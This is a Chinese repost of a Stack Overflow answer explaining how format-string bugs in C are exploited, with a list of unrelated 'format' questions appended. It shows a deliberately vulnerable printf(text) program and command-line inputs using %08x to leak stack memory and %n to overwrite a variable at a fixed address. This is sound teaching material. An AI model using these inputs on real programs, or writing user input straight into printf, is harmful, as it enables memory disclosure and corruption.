c - 如何利用 Format-String 漏洞？

转载作者：太空狗更新时间：2023-10-29 15:08:56

25

4

我在阅读有关代码漏洞的信息时发现了这个格式字符串漏洞。

Wikipedia说:

Format string bugs most commonly appear when a programmer wishes to print a string containing user supplied data. The programmer may mistakenly write printf(buffer) instead of printf("%s", buffer). The first version interprets buffer as a format string, and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended.

我得到了 printf(buffer) 版本的问题，但我仍然不明白攻击者如何利用这个漏洞来执行有害代码。有人可以通过示例告诉我如何利用此漏洞吗？

最佳答案

您可以通过多种方式直接或间接地利用格式字符串漏洞。让我们以下面的例子为例(假设没有相关的操作系统保护，无论如何这都是非常罕见的):

int main(int argc, char **argv)
{
    char text[1024];
    static int some_value = -72;

    strcpy(text, argv[1]); /* ignore the buffer overflow here */

    printf("This is how you print correctly:\n");
    printf("%s", text);
    printf("This is how not to print:\n");
    printf(text);

    printf("some_value @ 0x%08x = %d [0x%08x]", &some_value, some_value, some_value);
    return(0);
}

此漏洞的基础是具有可变参数的函数的行为。本质上，实现处理可变数量参数的函数必须从堆栈中读取它们。如果我们指定一个格式字符串，使 printf() 期望堆栈上有两个整数，并且我们只提供一个参数，则第二个参数必须是堆栈上的其他值。通过扩展，如果我们可以控制格式字符串，我们可以拥有两个最基本的原语:

从任意内存地址读取

[编辑] 重要:我在这里对栈帧布局做了一些假设。如果您了解漏洞背后的基本前提，则可以忽略它们，而且它们因操作系统、平台、程序和配置而异。

可以使用%s 格式参数来读取数据。您可以在 printf(text) 中读取原始格式字符串的数据，因此您可以使用它来读取堆栈中的任何内容:

./vulnerable AAAA%08x.%08x.%08x.%08x
This is how you print correctly:
AAAA%08x.%08x.%08x.%08x
This is how not to print:
AAAA.XXXXXXXX.XXXXXXXX.XXXXXXXX.41414141
some_value @ 0x08049794 = -72 [0xffffffb8]

写入任意内存地址

您可以使用%n 格式说明符写入任意地址(几乎)。同样，让我们假设我们上面的易受攻击的程序，让我们尝试更改位于 0x08049794 的 some_value 的值，如上所示:

./vulnerable $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
This is how you print correctly:
??%08x.%08x.%08x.%n
This is how not to print:
??XXXXXXXX.XXXXXXXX.XXXXXXXX.
some_value @ 0x08049794 = 31 [0x0000001f]

我们已经用遇到 %n 说明符之前写入的字节数覆盖了 some_value (man printf)。我们可以使用格式字符串本身，或者字段宽度来控制这个值:

./vulnerable $(printf "\x94\x97\x04\x08")%x%x%x%n
This is how you print correctly:
??%x%x%x%n
This is how not to print:
??XXXXXXXXXXXXXXXXXXXXXXXX
some_value @ 0x08049794 = 21 [0x00000015]

有许多可能性和技巧可以尝试(直接参数访问、大字段宽度使环绕成为可能、构建您自己的基元)，而这只是冰山一角。我建议阅读更多关于 fmt 字符串漏洞的文章(Phrack 有一些非常优秀的文章，尽管它们可能有点高级)或一本涉及该主题的书。

免责声明:示例摘自乔恩·埃里克森 (Jon Erickson) 所著的黑客:剥削的艺术(第 2 版)一书 [虽然不是逐字]。

关于c - 如何利用 Format-String 漏洞？，我们在Stack Overflow上找到一个类似的问题： https://stackoverflow.com/questions/28064827/

25

4

0

文章推荐： css - 三个可变宽度、等间距的 DIV？四呢？

文章推荐： jquery - 使用Google Maps Javascript API v3的HTML/CSS标记

文章推荐： c - 为什么 execv*() 参数与 execl*() 不一致？

file-format - GNAT-GVD : not in executable format: File format not recognized
我在运行 GNU Visual Debugger 1.2.6 的 XP 虚拟机上尝试打开 Ada 文件 (.adb)，但不断出现以下错误: not in executable format: File
二郎 - io :format 's result/(formatting with io_lib:format/2)
我正在尝试获取 io:format/1 的输出结果。我知道io_lib中也有类似的函数，io_lib:format/2，但是输出不一样。事实上，它根本没有做任何事情。如果我尝试绑定(bind) i
format - .clang-format 有没有办法在一行函数之前中断？
我在 documentation 中找不到任何内容, 甚至 BreakBeforeBraces: Allman格式化我已经拆分的单行函数 void foo() { bar(); } 我想要类似的东西
formatting - Format.fprintf 中框的缩进
请考虑函数f: open Format let rec f i = match i with | x when x () | i -> pp_open_hovbox std_form
format - cl :format 列表中每三个单词后换行
如何在列表中的每三个参数后添加一个回车符(使用 ~%)？例如，我现在: (format nil "~{~a ~}" (list '"one" '"two" '"three" '"four" '"fi
java - 继承代码 : To format or not to format?
关闭。这个问题是opinion-based .它目前不接受答案。想要改进这个问题？更新问题，以便 editing this post 可以用事实和引用来回答它. 关闭 6 年前。 Improve
c - fprintf，错误 : format not a string literal and no format arguments [-Werror=format-security
当我尝试在 Ubuntu 上编译 fprintf(stderr,Usage) 时，我遇到了这个错误: error: format not a string literal and no format
python - OpenCV 错误 : Unsupported format or combination of formats (Unsupported combination of input and output formats) in getRectSubPix
运行 cv2.getRectSubPix(img, (5,5), (0,0)) 抛出错误: OpenCV Error: Unsupported format or combination of for
android - cocos2d-x-2.1.4 : error: format not a string literal and no format arguments [-Werror=format-security]
我正在 cocos2d-x-2.1.4 上开发游戏，但是，当我尝试在 Android 上构建它时，它失败并出现错误:格式不是字符串文字且没有格式参数 [-Werror=format-安全] 在文件 C
clang-format - .clang-format 末尾的省略号是什么意思？
运行时: $ clang-format -style=Google -dump-config > .clang-format 文件后附有省略号 (...)。 TabWidth: 8 Us
d - `std.format.format!` 的纯版本？
我想在纯函数中将 double 型转换为字符串。我很困惑为什么这不是纯粹的: wstring fromNumber(double n) pure { import std.format;
format - Common Lisp `format` 实现
Common Lisp 的 format 是否有一个特别容易阅读的实现？我找到了 SBCL's version ，但由于 SBCL 以性能 Common Lisp 实现而著称，我想知道是否有一个更
java - 如何使用 "Out.Format(Format,String Var)"错误 "The method format(String, String) is undefined for the type JspWrite"在 JSP 页面格式化字符串？
嗨，我正在尝试在 JSP 页面上格式化字符串，它给了我错误，正如我在标题中提到的，我的代码是， String header=""; header = 12-29-2011 15;
clang-format - 你能设置 clang-format 的行长吗？
clang-format 将我的行拆分为 80 列。有没有办法让停止断线？ documentation似乎没有解决这个问题。最佳答案负责它的配置选项称为 ColumnLimit .您可以通过将其设
Angular库编译时错误 "Invariant violated: No format-path or format"
我有一个Angular 11项目，试图集成SpreadJS Designer，但在ngcc步骤Compiling @grapecity/spread-sheets-designer-angular :
clang-format - 如何在C99中将指定的初始值设定项与 clang-format 对齐？
我正在使用 clang-format 4.0.0来对齐我的个人项目。我将以下配置用于 clang-format 。 Language: Cpp BreakBeforeBraces: A
C程序警告: format not a string literal and no format arguments
我正在使用- char str[200]; ... sprintf(str,"%s", val) msg(str); sprintf(str, "%s: %s",timestr,"\n recv -"
c# - string.format(format,doubleValue) ，精度丢失
我有这个 double 值: var value = 52.30298270000003 当我将它转换为 string 时，它失去了它的精度: var str = string.Format("{0}
format - 如何在 Lisp 中使用 FORMAT 输出波形符？
关闭。这个问题不符合Stack Overflow guidelines .它目前不接受答案。这个问题似乎与 help center 中定义的范围内的编程无关。 . 关闭 8 年前。 Improve
clang-format - 在#pragma 中左对齐冒号 clang-format
如何使用 clang-format 始终将冒号左对齐。我不希望它被禁用:1234，但禁用:1234。 #pragma warning(disable: 1234) 最佳答案我猜你需要这个。 Spac

首页

博学

6Ren·AI

商城

c - 如何利用 Format-String 漏洞？

从任意内存地址读取

写入任意内存地址